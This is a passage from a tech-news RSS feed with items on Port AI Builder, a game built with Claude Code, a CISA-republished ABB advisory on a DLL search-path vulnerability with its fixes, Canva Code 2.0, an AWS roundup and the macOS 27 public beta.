<p class="wp-block-paragraph">Announced July 14, Port AI Builder lets teams create and run agentic workflows in natural language, with built-in human-in-the-loop review and approval. The platform lets organizations apply AI agents across the SDLC (software development life cycle), drawing on domain skills spanning site reliability engineering, devops, architecture, security, AI governance, data modeling, and UX, while maintaining governance and visibility, the company said. Port AI Builder is available through free and paid subscriptions.</p>



<p class="wp-block-paragraph">Port AI Builder works on top of Port’s Agentic SDLC Platform, which provides the context lake, workflow orchestration, agent management, and governance that enterprises need to operationalize AI SDLC, according to the company. The new AI Builder lets teams build production-grade workflows in minutes, for use cases such as autonomous resolution, AI cost management, and engineering performance tracking, without losing control, Port said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[iOS Developer Wins $25,000 After Building Entire Game With Claude Code in Two Weeks]]></title>
<description><![CDATA[An iOS developer with nearly nine years of experience has won $25,000 at Vibe Jam 2026 after building a capybara food delivery game in only two weeks using Claude Code and several other AI tools. 



The project includes more than 27,000 lines of AI-generated code, over 188 commits, multiplayer s...]]></description>
<link>https://tsecurity.de/de/3668615/ios-mac-os/ios-developer-wins-25000-after-building-entire-game-with-claude-code-in-two-weeks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668615/ios-mac-os/ios-developer-wins-25000-after-building-entire-game-with-claude-code-in-two-weeks/</guid>
<pubDate>Tue, 14 Jul 2026 18:18:14 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An iOS developer with nearly nine years of experience has won $25,000 at Vibe Jam 2026 after building a capybara food delivery game in only two weeks using Claude Code and several other AI tools. 



The project includes more than 27,000 lines of AI-generated code, over 188 commits, multiplayer support, custom editing tools, original music, 3D models, textures, illustrations, and a large open city that players can explore alone or with friends.











The developer, known online as Leo, created A Game About Capybaras Delivering Food, where players control a capybara riding a scooter while collecting and delivering stacked food orders before time runs out. 



Players must balance their items while driving, complete a timed shopping challenge inside a slippery convenience store, follow routes through an in-game navigation app, and avoid dropping food during sharp turns.



Leo said he spent $100 to upgrade from Claude Code’s Max 5x plan to the 20x plan. He also used ChatGPT Images, Grok, Tripo3D, Suno, and ElevenLabs for textures, character concepts, 3D assets, music, and sound effects, while Three.js powered the game itself.




“The game was entirely vibe-coded. In practice, I spent most of my time brainstorming, planning, and playing rather than generating code. I ran two to three Claude Code sessions at once, each working on a different part of the code to avoid conflicts,” Leo explained in his detailed development post.




Claude Code Built More Than the Game













Claude Code generated all the programming behind the game, but it also created the tools Leo needed to finish the project quickly. These included a custom map editor, terrain brushes, a procedural road builder, an in-game cinematic editor, a phone simulator, and systems for weather, lighting, multiplayer, item physics, and localization.



The map required the most manual work because AI-generated 3D cities lacked detail and performed poorly when players moved closer to buildings. Leo used the custom editor to place objects, shape mountains, paint terrain, create roads, position cameras, and build a city featuring beaches, farms, highways, suburban districts, and references to landmarks such as the Golden Gate Bridge and Christ the Redeemer.



The multiplayer mode uses a live WebSocket connection hosted through Cloudflare, allowing players to see each other’s movements, food stacks, messages, honks, and nearby music. The finished game also supports English, Hindi, Spanish, German, Korean, Mandarin Chinese, and Brazilian Portuguese.



Leo does not plan to release the project on Steam because the current version only offers around five to ten minutes of gameplay. However, the $25,000 win shows how an experienced developer can use AI coding tools to create, test, and polish a complete game concept within a short development window.]]></content:encoded>
</item>
<item>
<title><![CDATA[ABB Advant Master Online Builder]]></title>
<description><![CDATA[View CSAF
Summary
ABB became aware of vulnerability in the products versions listed as affected in the advisory, where an incorrect version of Online Builder (ONB) was included in the media. An update is available that resolves the vulnerability, see details in Recommended immediate actions.
The ...]]></description>
<link>https://tsecurity.de/de/3668599/it-security-nachrichten/abb-advant-master-online-builder/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668599/it-security-nachrichten/abb-advant-master-online-builder/</guid>
<pubDate>Tue, 14 Jul 2026 18:14:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-195-01_drupal.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>ABB became aware of vulnerability in the products versions listed as affected in the advisory, where an incorrect version of Online Builder (ONB) was included in the media. An update is available that resolves the vulnerability, see details in Recommended immediate actions.</strong></p>
<p>The following versions of ABB Advant Master Online Builder are affected:</p>
<ul>
<li>Control Builder A &lt;=1.4/4 (CVE-2025-13162)</li>
<li>800xA for Advant Master &lt;=6.0.3-1, &lt;=6.1.1-1, 6.1.1-3, 6.2.0-1 (CVE-2025-13162, CVE-2025-13162, CVE-2025-13162, CVE-2025-13162)</li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 4.4</td>
<td>ABB</td>
<td>ABB Advant Master Online Builder</td>
<td>Uncontrolled Search Path Element</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Critical Manufacturing</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>Switzerland</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-13162</a></h3>
<div class="csaf-accordion-content">
<p>The application improperly handles the search path for loading DLL´s, potentially allowing unauthorized libraries from untrusted directories. An attacker who obtains the necessary access could exploit the vulnerability leading to unauthorized code execution and compromising system integrity.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-13162">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB Advant Master Online Builder</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB Control Builder A &lt;=1.4/4, ABB 800xA for Advant Master &lt;=6.0.3-1, ABB 800xA for Advant Master &lt;=6.1.1-1, ABB 800xA for Advant Master 6.1.1-3, ABB 800xA for Advant Master 6.2.0-1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>ABB has investigated the vulnerability and remediated it in the newly released versions. The vulnerability has been resolved in the product versions listed as fixed in the advisory. - Version 6.1.1-2 does not contain this vulnerability and therefore no update is required. The vulnerability was again introduced in 6.1.1-3 when an older ONB version was included in the release media. - Version 6.1.1-4 do not contain this vulnerability but present version 6.1.1-3 by 800xA System Installer and System Configuration Console (SCC). Version 6.1.1-4 is therefore withdrawn. - Version 6.2.0-2 do not contain this vulnerability but present version 6.2.0-1 by 800xA System Installer and System Configuration Console (SCC). Version 6.2.0-2 is therefore withdrawn. ABB recommends that customers apply the update at their earliest convenience. - Control Builder A: It is recommended to update Control Builder A to version 1.4/5 or later. - 800xA for Advant Master: - Versions 6.0.3-1 and earlier, - Versions 6.1.1-1 and earlier, - Versions 6.1.1-2, 6.1.1-3, and 6.1.1-4 should be updated to version 6.1.1-5 or later. - 800xA for Advant Master: - Versions 6.2.0-1 and 6.2.0-2 should be updated to version 6.2.0-3 or later.</p>
<p><strong>Mitigation</strong><br>Since it is required that the attacker has access to the system, it is important that all users that have access to the system are managed as recommended by ABB guidelines. - Allow only authorized users to log on to the system and enforce strong passwords that are changed regularly. - Restrict temporary connection of portable computers, USB memory devices and other removable data carriers. Computers that can be physically accessed by regular users should have ports for removable data carriers disabled or at least managed to only allow intended device types. For more information on recommended practices, see [1].</p>
<p><strong>Workaround</strong><br>The recommendation is to upgrade to a version where the vulnerability is corrected. If an upgrade Is not possible and a workaround is needed, contact ABB Support.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/427.html">CWE-427 Uncontrolled Search Path Element</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.4</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N">CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>ABB PSIRT reported this vulnerability to CISA.</li>
</ul>
<hr>
<h2>Notice</h2>
<p>The information in this document is subject to change without notice, and should not be construed as a commitment by ABB. ABB provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall ABB or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if ABB or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from ABB, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.</p>
<hr>
<h2>Frequently Asked Questions</h2>
<p>What is the scope of vulnerability? - An attacker who successfully exploited this vulnerability could insert and run arbitrary code in an affected system node. What causes the vulnerability? - The vulnerability is caused by not having restricted permission on an application directory where DLL files are stored. What is Advant Master Online Builder? - Online Builder is part of Control Builder A, being a set of applications for configuration and programming of Advant Master controllers. Online Builder is also part of 800xA for Advant Master, an extension package to System 800xA connecting to Advant Master controllers. What might an attacker use the vulnerability to do? - An attacker who successfully exploited this vulnerability can run arbitrary code in an affected node. How could an attacker exploit the vulnerability? - An attacker who obtains the necessary access could exploit vulnerability by placing malicious DLL´s in the unrestricted application directory, leading to unauthorized code execution and compromising system integrity. Could the vulnerability be exploited remotely? - No, to exploit this vulnerability an attacker would need to have physical access to an affected system node. Can functional safety be affected by an exploit of this vulnerability? - No. What does the update do? - The update of the Online Builder (ONB) resolves the vulnerability by adding restrictions to the application folder, requiring authentication. When this security advisory was issued, had this vulnerability been publicly disclosed? - No, ABB identified this vulnerability through its internal security assessment and verification processes. When this security advisory was issued, had ABB received any reports that this vulnerability was being exploited? - No, ABB had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued.</p>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities.</p>
<p>Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolate them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<hr>
<h2>Advisory Conversion Disclaimer</h2>
<p>This ICSA is a verbatim republication of ABB PSIRT 7PAA020047 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory.</p>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-06-23</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-06-23</td>
<td>1</td>
<td>Initial version.</td>
</tr>
<tr>
<td>2026-07-14</td>
<td>2</td>
<td>Initial CISA Republication of ABB PSIRT 7PAA020047 advisory</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[Canva launches Code 2.0, offering AI website building to every user — including free accounts]]></title>
<description><![CDATA[Canva on Tuesday launched Canva Code 2.0, a major upgrade to its AI-powered coding tool that lets users build interactive websites, apps, and experiences using plain-language prompts — and then edit the results as easily as tweaking a Canva presentation. The feature is now available to all of the...]]></description>
<link>https://tsecurity.de/de/3668119/it-nachrichten/canva-launches-code-20-offering-ai-website-building-to-every-user-including-free-accounts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668119/it-nachrichten/canva-launches-code-20-offering-ai-website-building-to-every-user-including-free-accounts/</guid>
<pubDate>Tue, 14 Jul 2026 15:32:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://www.canva.com/">Canva</a> on Tuesday launched <a href="https://www.canva.com/ai-code-generator/">Canva Code 2.0</a>, a major upgrade to its AI-powered coding tool that lets users build interactive websites, apps, and experiences using plain-language prompts — and then edit the results as easily as tweaking a Canva presentation. The feature is now available to all of the company's more than 265 million monthly users across every pricing tier, including free accounts.</p><p>The move is Canva's most aggressive push yet into the fast-growing "vibe coding" market, a category that barely existed 18 months ago but has already minted billion-dollar startups and reshaped how non-developers think about building software. But where rivals like <a href="https://lovable.dev/">Lovable</a>, <a href="https://replit.com/">Replit</a>, and <a href="https://bolt.new/">Bolt.new</a> have focused primarily on generating functional code from text prompts, Canva is making a different bet: that the real bottleneck isn't creating the code — it's making the output actually look good.</p><p>"Most vibe coding tools stop at functional — generating output that looks the same as everyone else's," Canva states in its announcement. "You might get a working prototype, but making it actually look like yours requires a complex editing surface, a separate design tool, a developer, or endless back-and-forth prompting that rarely lands where you want it.”</p><p>Danny Wu, Canva's Head of AI Products, framed the product's positioning in stark terms during an exclusive interview with VentureBeat ahead of the launch.</p><p>"We are deliberately targeting non-technical users," Wu said. "Canva Code isn't a tool we're building for developers. What we're trying to do is bring the power of AI coding — and really lightweight coding — into the Canva platform, while answering our users' requests for more interactivity, more customization, and more flexibility, from websites to interactive presentations."</p><h3><b>Canva Code 2.0 brings drag-and-drop editing, HTML import, and 75% faster generation to AI-built websites</b></h3><p>The update introduces several capabilities designed to collapse the distance between generating code and publishing a polished interactive experience. Users can now create Canva Code projects directly inside other design projects — embedding interactive elements within a whiteboard, presentation deck, or standalone page. <a href="https://www.canva.com/">Canva</a> has also added more than 50 new templates specifically designed for interactive designs, along with the ability to import raw HTML files from other AI coding tools and convert them into editable Canva designs.</p><p>The performance improvements are significant. Canva says it has reduced average code generation time by 75 percent and cut the median time from initial prompt to a published site by 30 percent. The company also reports that integrating <a href="https://www.canva.com/ai-code-generator/">Canva Code</a> into the broader Canva editor — allowing users to treat coded outputs like any other design element — has increased active Code users by 25 percent.</p><p>Perhaps the most distinctive feature is the editing experience itself. Unlike most AI coding platforms, which require users to re-prompt or modify raw code to make visual changes, <a href="https://www.canva.com/ai-code-generator/">Canva Code 2.0</a> lets users click directly into generated elements to change text, drag and drop images from Canva's built-in library of over 120 million templates and assets, update colors and fonts through a familiar toolbar, or select a specific element and refine it through conversational AI. Every output is fully interactive and automatically adapts to different screen sizes, with a built-in mobile preview.</p><p>Wu demonstrated the drag-and-drop editing during the interview, showing how a generated conference website could be modified in real time — swapping in photos, changing fonts to branded alternatives, and editing text directly on the canvas. "The key differentiator with Canva Code is the editability and the kindness of the outputs it generates," he said, though he noted one current limitation: "We don't support moving elements around. You still have to re-prompt for that."</p><h3><b>How Canva plans to compete with Lovable, Replit, and Bolt in the booming AI app builder market</b></h3><p>Canva's entry into vibe coding at this scale arrives at a pivotal moment for the category. According to <a href="https://www.useluminix.com/reports/industry-analysis/vibe-coding-tool-landscape-replit-v0-base44-bolt-lovable-vercel/source/0">market research published by Luminix AI in May 2026</a>, the vibe coding and AI app builder market has reached an estimated $4.7 billion in 2026, with projections pointing toward $12.3 billion by 2027 at roughly 38 percent compound annual growth. The research also estimates that AI-generated code now comprises approximately 41 percent of all code written globally — a figure that would have seemed inconceivable even two years ago.</p><p>The competitive landscape has grown ferocious. <a href="https://lovable.dev/dashboard">Lovable</a>, which focuses on conversational, design-forward app generation for non-technical founders, has achieved what may be the fastest revenue ramp in the category's history — reportedly reaching approximately $400 million in annual recurring revenue by early 2026, according to Luminix's analysis. <a href="https://replit.com/">Replit</a>, which transformed its browser-based IDE into a full vibe-coding engine through successive AI agent releases, has tripled its valuation to $9 billion and is targeting $1 billion in run-rate revenue by the end of 2026, per the same report. <a href="https://bolt.new/">Bolt.new</a>, which runs a full Node.js environment entirely in the browser, scaled from $4 million to $40 million in ARR within months of launching.</p><p>And then there is Canva, which brings something none of those platforms possess: a quarter-billion-user design ecosystem where brands, teams, and individuals already store their visual identities, collaborate on projects, and publish content.</p><p>Wu positioned <a href="https://bolt.new/">Canva Code</a> not as a direct competitor to these developer-focused tools but as something that fills a gap none of them have addressed. "A lot of the requests that we have been getting and the usage we're seeing is actually with using Canva Code not necessarily as just one artifact, but as part of an overall design, the visual communication they're trying to tell," Wu said. "Like when you have a sales deck, you're able to add a calculator, you're able to add a visualizer of what exactly your product does. That's something where an interactive slide can be worth a thousand pictures."</p><h3><b>Why Canva's HTML import feature could turn it into a 'finishing layer' for every AI coding tool</b></h3><p>One of the most strategically interesting features in <a href="https://bolt.new/">Canva Code 2.0</a> is its HTML import capability, which allows users to take code generated by any AI tool — including <a href="https://chatgpt.com/">ChatGPT</a>, <a href="http://claude.ai/">Claude</a>, <a href="https://lovable.dev/dashboard">Lovable</a>, or <a href="https://bolt.new/">Bolt</a> — and bring it into Canva as a fully editable design. The implication is unmistakable: Canva is positioning itself as the place where AI-generated code gets its finishing touches, regardless of where it was originally created.</p><p>When asked directly whether this amounts to positioning Canva as a "finishing layer on top of vibe coding," Wu offered a diplomatic but revealing response. "It's really a continuation of our goal to make all design as easy as possible," he said. "We've supported importing PDFs and translating them into docs, importing PowerPoint files — so in one way, it's an expansion of that. But in another way, it's really just listening to what our users want and making Canva both the most useful and the most compatible platform.”</p><p>He paused, then added: "It's not that we're deliberately positioning ourselves as a specific layer, say like a finishing layer after vibe coding. We just really want to make our platform the most accessible and the most pluggable."</p><p>That language — "most pluggable" — suggests a platform strategy that doesn't require Canva to win the AI code generation race outright. If Canva becomes the default destination for making AI-generated code look professional and on-brand, it captures value from the entire category regardless of which code generation engine users prefer. The strategy also echoes the broader import capabilities that already allow Canva to ingest PowerPoint decks and PDFs from competing platforms, gradually pulling users deeper into the Canva ecosystem without demanding they abandon existing workflows.</p><h3><b>What Canva Code can build — and where Danny Wu says it hits its limits</b></h3><p>Wu was notably candid about the product's boundaries — a refreshing departure from the typical Silicon Valley product launch. "Canva Code is great for anything that works as a front-end app, and it's especially good when you want to leverage data, data submissions, and interactivity at small to medium scale," he said. "I'll be honest about the limitations. Canva Code is probably not going to be suitable if you're trying to build a website with complex backends, or if you're handling hundreds of thousands of visitors per day."</p><p>This candor effectively draws a line between <a href="https://www.canva.com/ai-code-generator/">Canva Code</a> and the more ambitious platforms in the space. While Lovable and Replit are pushing toward full-stack application development — complete with databases, authentication, and production-grade hosting — Canva is deliberately limiting its scope to interactive front-end experiences at modest scale. The question is whether that's a strategic weakness or a disciplined focus. For the teachers, small business owners, and marketing teams that make up the bulk of Canva's user base, complex backends and high-traffic scalability are irrelevant concerns. What matters is whether they can create an interactive event page, a property listing website, or a classroom hub that looks professional and works on mobile — without hiring a developer or learning a new tool.</p><p>When asked about the AI models powering <a href="https://www.canva.com/ai-code-generator/">Canva Code</a>, Wu confirmed the company uses a combination of proprietary and third-party models, including those from OpenAI and Anthropic, but declined to specify the exact mix. "We don't share the exact mix, and it does change over time," he said. "We also route differently depending on what you're asking for and which model family we think is best for handling certain requests."</p><h3><b>Canva's AI acquisition spree — from Affinity to Leonardo.ai — now powers its vibe coding push</b></h3><p>Canva's broader AI infrastructure has been significantly bolstered by an acquisition strategy that has accelerated over the past two years. In March 2024, <a href="https://www.canva.com/newsroom/news/affinity/">the company acquired Affinity</a>, the British creative software suite popular with Mac users, in a deal that Bloomberg reported was valued at "<a href="https://www.bloomberg.com/news/articles/2024-03-26/canva-acquires-affinity-design-suite-in-push-to-rival-adobe">several hundred million pounds</a>." Canva at the time positioned the deal as a way to compete with Adobe's flagship products — Illustrator, Photoshop, and InDesign — by gaining ownership of Affinity's Designer, Photo, and Publisher applications.</p><p>Just four months later, Canva acquired <a href="http://leonardo.ai/">Leonardo.ai</a>, an Australian generative AI startup with over 19 million registered users and more than a billion images generated. Canva co-founder Cameron Adams said at the time that Leonardo.ai's technology would be integrated into Canva's Magic Studio generative AI suite.</p><p>Together with these acquisitions, <a href="https://www.canva.com/ai-code-generator/">Canva Code</a> is the company's attempt to layer interactive, code-driven capabilities on top of a visual design platform that has already been enhanced by professional-grade design tools and generative AI models. The company reports over 32 billion uses of its AI products to date — a staggering figure that underscores how deeply AI is now woven into everyday Canva workflows, even for users who may not think of themselves as using artificial intelligence.</p><h3><b>Six million sites published, but Canva's retention data remains an open question</b></h3><p>Canva's announcement highlights an impressive traction metric: users have created and published more than six million websites using Canva Code since the feature was first introduced a year ago. But the number deserves scrutiny.</p><p>Wu clarified in the interview that the six million figure represents published websites over the past year — meaning sites that were either made public or shared via password-protected or private links. "They may have published publicly, or behind a password, or as a private link. But that's the number of published websites," he said.</p><p>When asked about active retention — how many of those sites are still live and being maintained — Wu acknowledged the gap in his data. This is a meaningful distinction. In the vibe coding market, raw creation numbers can be misleading because the barrier to generating a site is so low. The more telling metric — which Canva does not yet provide — would be how many of those six million sites receive regular traffic or have been updated after initial publication.</p><p>The early use cases, however, suggest genuine utility beyond novelty. Educators and school administrators are using Canva Code to build classroom hubs, with one teacher creating bespoke webpages for each of their classrooms to keep students and parents updated on announcements. Small businesses, like Alt Marketing School, have built mini apps for fundraising training and interactive roadmaps for their members. For World Book Day, 50 readers created educational games across different subjects, complete with pedagogical guides for classroom use.</p><h3><b>Canva Code pricing, data governance, and what enterprise customers need to know</b></h3><p><a href="https://www.canva.com/ai-code-generator/">Canva Code 2.0</a> is available across all of Canva's pricing tiers, including its free plan — a notable decision given that competitors like Lovable, Bolt, and Replit reserve their most capable features for paid subscribers. "As you go from, say, free to pro to business to enterprise, you would get more AI credits and be able to have higher usage of Canva Code," Wu said. "But it is available and it is usable — even free Canva accounts as well as education and not-for-profit accounts."</p><p>This credit-based approach mirrors the pricing evolution happening across the entire vibe coding category, where platforms have converged on token or credit systems that meter AI generation capacity rather than gating features behind subscription tiers. The difference is that Canva's free tier serves as an acquisition funnel for a much larger design platform, not just for the coding feature itself.</p><p>For the institutional customers Canva increasingly courts — school districts, real estate brokerages, enterprise marketing teams — data governance is a threshold concern. Wu addressed this directly. "All users and customers have full control over how their data is used," he said. "They can choose whether their prompts and data are used for AI training in the settings. For businesses and enterprises, team admins can manage this at the organizational level and guarantee that their inputs, content, and outputs won't be used for training." This opt-out approach reflects a lesson the broader industry has learned the hard way. As The Verge reported when Canva acquired Leonardo.ai, Adobe suffered significant backlash over a policy update regarding user data and AI model training — a controversy Canva appears keen to avoid.</p><h3><b>Canva's long-term vision: closing the gap between imagination and what non-technical users can actually build</b></h3><p>When asked where <a href="https://www.canva.com/ai-code-generator/">Canva Code</a> fits into the company's long-term trajectory — and whether Canva is building toward a full-stack app development platform — Wu steered the conversation back to the company's core audience.</p><p>"A huge part of it is reducing the gap between your imagination and what's possible, especially for everyday users — people who don't have a lot of time," he said. "They don't have time to figure out deploys or MCPs or APIs. They just want to design more interactive and more dynamic communication."</p><p>He pointed to the rapid improvement in AI model capabilities as a key accelerant. "The kind of things you can create today in one shot — like a 3D visualization of a solar system — you really couldn't have trusted the output a year ago. But today, you have a really high success rate."</p><p>Whether <a href="https://www.canva.com/ai-code-generator/">Canva Code</a> becomes a durable product category or a feature that gets absorbed into the platform's broader AI workflow will depend on how quickly the company can close the gap between its current front-end focus and the full-stack capabilities that increasingly define the competition. Lovable is shipping Supabase-backed apps with authentication and databases built in. Replit's agents can execute autonomous long-running builds. Bolt.new runs entire Node.js environments in a browser tab. These are fundamentally different ambitions than making a conference landing page look good.</p><p>But Canva has never won by matching the technical depth of its competitors. A decade ago, it didn't try to out-feature Adobe — it made design accessible to the 99 percent of people who would never open Photoshop. Now, in a vibe coding market where every tool can generate a working prototype from a prompt, Canva is making the same wager it made in 2012: that for most people, the hardest part was never the building. It was making it look like it came from you.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AWS Weekly Roundup: AWS Builder Center at 1 year, Network Scanning in Security Hub, Loom for AWS, and more (July 13, 2026)]]></title>
<description><![CDATA[AWS Builder Center turned one year old last week. Launched on July 9, 2025, the platform has grown from a community hub with Wishlist voting, community profiles, and a toolbox into a full ecosystem with sandbox environments, workshops, Spaces, and a Builders’ Library. To mark the anniversary, Ric...]]></description>
<link>https://tsecurity.de/de/3667461/ai-nachrichten/aws-weekly-roundup-aws-builder-center-at-1-year-network-scanning-in-security-hub-loom-for-aws-and-more-july-13-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667461/ai-nachrichten/aws-weekly-roundup-aws-builder-center-at-1-year-network-scanning-in-security-hub-loom-for-aws-and-more-july-13-2026/</guid>
<pubDate>Tue, 14 Jul 2026 11:33:58 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[AWS Builder Center turned one year old last week. Launched on July 9, 2025, the platform has grown from a community hub with Wishlist voting, community profiles, and a toolbox into a full ecosystem with sandbox environments, workshops, Spaces, and a Builders’ Library. To mark the anniversary, Rick Suttles published a full feature timeline covering […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Releases macOS 27 Golden Gate Public Beta With Big AI Features]]></title>
<description><![CDATA[Apple has released the first public beta of macOS 27 Golden Gate, allowing users outside the developer program to test the update before its full release later this year. The public beta follows three developer beta releases and includes the new Siri AI experience, design refinements, improved se...]]></description>
<link>https://tsecurity.de/de/3666613/ios-mac-os/apple-releases-macos-27-golden-gate-public-beta-with-big-ai-features/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666613/ios-mac-os/apple-releases-macos-27-golden-gate-public-beta-with-big-ai-features/</guid>
<pubDate>Tue, 14 Jul 2026 02:08:28 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has released the first public beta of macOS 27 Golden Gate, allowing users outside the developer program to test the update before its full release later this year. The public beta follows three developer beta releases and includes the new Siri AI experience, design refinements, improved search, and several Apple Intelligence upgrades.



Since this is pre-release software, users should expect bugs, compatibility problems, increased battery use, and occasional performance issues. Apple recommends installing beta software on a secondary Mac or a separate partition rather than a work or business-critical computer.



How to install macOS 27 Golden Gate public beta



Back up your Mac before installing the update so you can protect your files if something goes wrong.




Visit the Apple Beta Software Program website and sign in using your Apple Account.



Enrol your Mac in the public beta program.



Open System Settings on your Mac.



Select General, followed by Software Update.



Click the information button next to Beta Updates.



Choose macOS 27 Golden Gate Public Beta from the menu.



Click Done and wait for the update to appear.



Select Update Now and follow the on-screen instructions.




The installation can take some time, and your Mac may restart several times during the process.



Everything new in macOS 27 Golden Gate public beta




New Siri AI experience: Siri now works as a more capable conversational assistant and supports natural follow-up questions. It can search the web, provide detailed answers, and help with tasks across supported apps.



Personal context searches: Siri can search information stored in apps such as Mail, Messages, Notes, and Photos. For example, users can ask Siri to locate an old email, find a particular photo, or retrieve information shared in a conversation.



Dedicated Siri app: macOS 27 introduces a separate Siri app that stores conversations in one place. Users can continue previous conversations, start new ones, and access Siri through Spotlight using Command + Space.



Visual Intelligence on Mac: Siri can examine content displayed on the screen and answer questions about it. This can help users understand documents, images, webpages, and other visible information.



Improved Spotlight search: Apple has updated the search system to deliver more reliable results across files, apps, emails, and messages. Users can also access Siri AI directly through Spotlight.



Updated Liquid Glass design: The update reduces excessive transparency and improves the way complex backgrounds appear behind menus and windows. Apple has also added more depth between interface elements, making it easier to identify the active window.



Transparency controls: Users can adjust the amount of system transparency using a new slider, providing more control over the Liquid Glass appearance.



More consistent windows and toolbars: Apps now use more consistent corner shapes, toolbar layouts, headings, and controls. Sidebars extend to the edges of windows instead of appearing as floating panels.



Writing tools powered by Siri: The updated writing tools can generate text, correct grammar, rewrite existing content, and offer feedback on drafts.



